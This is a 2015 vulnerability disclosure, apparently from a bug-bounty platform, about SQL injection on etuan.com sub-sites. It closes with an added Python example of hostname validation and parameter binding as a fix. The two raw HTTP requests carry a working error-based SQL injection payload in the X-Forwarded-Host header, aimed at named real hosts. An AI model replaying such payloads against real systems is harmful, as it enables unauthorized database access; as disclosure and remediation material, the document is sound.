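2015-01-09: Details reported to the vendor; awaiting vendor handling.
2015-01-14: The vendor chose to ignore the vulnerability; details disclosed to the public.
SQL injection on 一团网 (etuan.com) sub-sites, bundled report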
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
X-Forwarded-Host: 'and(select 1 from(select count(*),concat((select concat(user()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
Cookie: PHPSESSID=6d36d1b6e59e835bdea51acdb42072f5; 28BB_goodsnum=0; 28BB_tm_visit_product=1; 28BB_viewed_goods=ozJEfM84uHcI9SNIwEqUcBlBr01mzzFzawv6UtIucqFDIa_ESux1Hd_FEeowOSz124cqGYHqSUXW0S4dDwXpUHcgEqZvDWKcz5BZI84uHsI9SNKwEqUcBBEr0eEyhXb-v1WtcecwlLyawcZugFZbC0GqEVf
Host: laoxuehost.etuan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
Content-Length: 4

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
X-Forwarded-Host: 'and(select 1 from(select count(*),concat((select concat(user()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
Cookie: PHPSESSID=a98accd84226396945c559d0d4d5bb36; 28BB_goodsnum=0; 28BB_tm_visit_product=1; 28BB_viewed_goods=ZCiy8irUIP92Wgj3Qc31NSzu7NYkmDhYj6g_1JuIo5IRH58-NcGPGuGOnVLeCoXzqx9hJo40TnIh_yzdZmJd52c1inNj3cNie15OKeHeF2UAj0Qx75PyTj7NIlIAfct5QPc7xk8HCs09OhpCfyuM-OZK-GiDjv3; 28BB_tm_login=1
Host: yunlifang.etuan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
Content-Length: 6
Severity: no impact (ignored by vendor)
Ignored at: 2015-01-14 21:58
None yet.
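The requests above show the X-Forwarded-Host header reaching a SQL statement unfiltered. The following is an added example of the server-side fix, not code from the report or from the affected site: the header is accepted only if it parses as a hostname under an expected suffix, and the value is bound as a query parameter. The `shops` table, `ALLOWED_SUFFIX`, the function names and the use of `sqlite3` in place of the site's database are all assumptions made for illustration.

```python
import re
import sqlite3

# Assumption: sub-sites are only ever served under this suffix.
ALLOWED_SUFFIX = ".etuan.com"
# RFC 1123 style labels (letters, digits, hyphen) plus an optional :port.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
_HOST_RE = re.compile(rf"({_LABEL}(?:\.{_LABEL})+)(?::\d{{1,5}})?")


def normalize_host(raw):
    """Return the lower-cased hostname, or None if the value is not an allowed host."""
    if raw is None or len(raw) > 260:
        return None
    # A proxy chain may send a comma-separated list; the first entry is the original.
    first = raw.split(",")[0].strip().lower()
    m = _HOST_RE.fullmatch(first)
    if m is None or not m.group(1).endswith(ALLOWED_SUFFIX):
        return None
    return m.group(1)


def resolve_shop(conn, headers):
    """Map a request to a sub-site. Returns (status, shop_name)."""
    raw = headers.get("X-Forwarded-Host", headers.get("Host"))
    host = normalize_host(raw)
    if host is None:
        return 400, None  # reject; never fall through with the raw value
    # The host is bound as a parameter, so it cannot change the statement.
    row = conn.execute("SELECT name FROM shops WHERE host = ?", (host,)).fetchone()
    return (200, row[0]) if row else (404, None)


def demo_db():
    """Constructed sample data (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE shops (host TEXT PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO shops VALUES (?, ?)",
        [("laoxuehost.etuan.com", "shop-a"), ("yunlifang.etuan.com", "shop-b")],
    )
    return conn


if __name__ == "__main__":
    db = demo_db()
    print(resolve_shop(db, {"Host": "laoxuehost.etuan.com"}))
    print(resolve_shop(db, {"X-Forwarded-Host": "'and(select 1)and'"}))
```

Validation and parameter binding are independent layers: binding alone already stops the header from altering the statement, and the hostname check keeps malformed values out of logs, caches and redirects that reuse the same header.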